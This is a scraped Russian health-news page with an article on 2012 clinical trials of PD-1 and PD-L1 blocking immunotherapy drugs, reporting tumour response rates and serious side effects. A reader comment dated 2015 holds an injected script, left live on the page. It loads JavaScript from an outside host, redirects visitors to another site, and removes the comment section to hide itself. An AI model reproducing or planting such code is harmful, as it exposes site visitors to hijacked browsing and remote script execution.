Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Созданы лекарства, которы...  >>  Созданы лекарства, которые обучают организм убивать рак. Это победа!
 
Обратная связь
 

Созданы лекарства, которые обучают организм убивать рак. Это победа!

Размер шрифта
04 июля 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Американские ученые создали препараты, с помощью которых иммунная система находит и убивает раковые клетки. Результаты проведенных исследований свидетельствуют о том, что новый препарат эффективен для лечения немелкоклеточного рака легких, меланомы и рака почек.




Механизм действия препаратов

Новые препараты убивают раковые клетки не напрямую, а опосредованно, блокируя сигнальный путь, который защищает раковые клетки от иммунной системы.

Сигнальный путь состоит из двух белков: PD-1, который находится на поверхности клеток иммунной системы, и PD-L1, который находится на поверхности раковых клеток. Когда эти белки объединяются, они формируют защиту раковой клетки от иммунной системы.

Для того чтобы иммунная система могла атаковать раковые клетки, ученые создали 2 препарата, один из которых блокирует белок PD-1, а другой – белок PD-L1.

Суть исследований

Изучение иммунной терапии проводилось в двух клинических исследованиях. Препараты вводились внутривенно в амбулаторных условиях каждые две недели; курс лечения мог продолжаться в течение двух лет. Новые препараты вводили пациентам с прогрессирующим раком различной локализации, у которых стандартное лечение было неэффективно.

При использовании препарата, блокирующего белок PD-1, существенное уменьшение размеров опухоли наблюдалось у 14 из 76 (18%) пациентов с немелкоклеточным раком легких, у 26 из 94 (28%) пациентов с меланомой и у 9 из 33 (27%) пациентов с раком почек. При использовании препарата, блокирующего белок PD-L1, положительный эффект наблюдался у 5 из 49 (10%) пациентов с немелкоклеточным раком легких, 9 из 52 (17%) пациентов с меланомой и 2 из 17 (12%) пациентов с раком почек.

Побочные эффекты

Тяжелые побочные эффекты в ответ на введение препарата, блокирующего белок PD-1, выявлены у 41 из 296 (14%) пациентов. Большинство из них были обусловлены иммунными нарушениями: воспаление кишечника, нарушение функции щитовидной железы и три смерти от пневмонии (воспаление легких). При использовании другого препарата тяжелые побочные эффекты развились у 9% пациентов; летальных исходов не зарегистрировано.

Результаты исследований

После проведения иммунной терапии пациентов наблюдали в течение года. В одном исследовании лечение было эффективно у 2/3 пациентов, в другом исследовании – у половины пациентов. Ученые не ожидали, что на опухоли, которые не поддавались стандартным методам лечения, удастся воздействовать с помощью новых препаратов. Создание этих препаратов открывает перспективы для лечения пациентов, которым в настоящее время врачи не могут помочь. Учитывая положительные результаты, ученые планируют проводить новые исследования, которые позволят получить дополнительные данные об этих препаратах.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:39

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Диагностика и лечение с помощью света   Если вы грамотно лечите грипп, вы защищаете себя от рака кожи   Специализированное питание как важный фактор лечения и реабилитации пациентов с онкологическими заболеваниями   Вирус простуды убивает раковые клетки  
06 февраля 2013Технология разведения коров позволяет определить риск развития рака 18 октября 2012Новый тест скажет, будет у вас рак или нет
 
09 августа 2012Раковые клетки теперь не смогут скрыться! 03 июля 2012Созданы лекарства, которые обучают организм убивать рак
 

Слайдшоу

1
Самая лучшая еда для похудения, сердца и против рака
Факторы, которые влияют на возникновение рака
Быстроразвивающиеся виды рака. Часть 1

Тесты

1
Средства личной гигиены
Что вы знаете о поджелудочной железе?
Что скрывает ваша моча?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.